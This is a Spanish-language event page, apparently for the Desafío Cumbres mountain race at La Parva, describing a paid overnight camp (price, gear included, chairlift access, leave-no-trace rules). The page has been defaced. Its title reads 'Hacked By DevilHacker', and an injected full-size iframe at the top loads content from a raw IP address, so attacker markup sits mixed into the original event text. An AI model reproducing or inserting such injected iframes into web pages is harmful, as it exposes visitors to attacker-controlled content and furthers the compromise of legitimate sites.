<title>Hacked By DevilHacker</title>
<div dir="rtl" style="text-align: right;" trbidi="on">


<center><iframe height="1000" src="http://131.72.236.68/~ahumadod/index.php" width="1300"></iframe></div></center>


</div>

ALOJAMIENTO

1234

VIVE LA EXPERIENCIA DESAFÍO CUMBRES (Para corredores o espectadores)

Si quieres ser parte del Desafío Cumbres pero no te sientes preparado para competir, tienes la oportunidad de unirte a esta experiencia subiendo a pasar la noche del día viernes 18 de marzo, junto a los corredores y el staff de la carrera.

El Desafío Cumbres no solo es una carrera en la montaña, tiene además la característica especial que involucra los aspectos de la vida en la montaña, junto a toda la camaradería y amistad que se genera en las alturas. Compartir de una fogata bajo las estrellas a 3.600 msnm. es una experiencia única en la vida.

Post-Campamento

Vivir esta experiencia es una de las alternativas que ofrece el Desafío Cumbres este año. El objetivo con esto es invitar a la gente a subir para que seamos más en la montaña, para que juntos armemos un buen grupo de montañeros, y de paso animemos en la partida a quienes lo dejarán todo en la carrera.

Si eres corredor, también puedes quedarte en el campamento, y así vivir la experiencia en la montaña, aprovechando de aclimatar para la carrera.

Esta es una alternativa independiente de la inscripción. El alojamiento tiene un valor de $30.000 por persona e incluye:

– Cupo individual, en una carpa para 2 personas
– Catre de campaña + Plumón
– Agua Potable / baños (químicos)
– Mesas de apoyo para cocinar
– Fogata para disfrutar de la noche
– Guía para subir al cerro Parva el día sábado
– Mini Kit Experiencia Desafío Cumbres

Camp

Solo necesitas llevar tu saco de dormir, tu cocinilla y tu comida.

Para llegar al campamento, debes llegar a la silla del Águilas en La Parva (Bikepark), el viernes 18 antes de las 15 hrs. El ticket tiene un valor de 10.000 ida y vuelta, se paga directamente en la base de la silla.

Para reservar tu cupo, ingresa en este link y sigue los pasos en la página.

No dejar rastro

La competencia se desarrolla en un sector único y de gran belleza, destino de muchos montañistas y visitantes que buscan el contacto con la montaña y la naturaleza en su plenitud. Conservar este lugar y minimizar los impactos es tarea de cada uno de nosotros, es por esto que todos quienes suban a presenciar la competencia deben ser sumamente conscientes de que cuidar y proteger este lugar está en nuestras manos. Todo lo que subas debe regresar contigo, sobre todo la basura.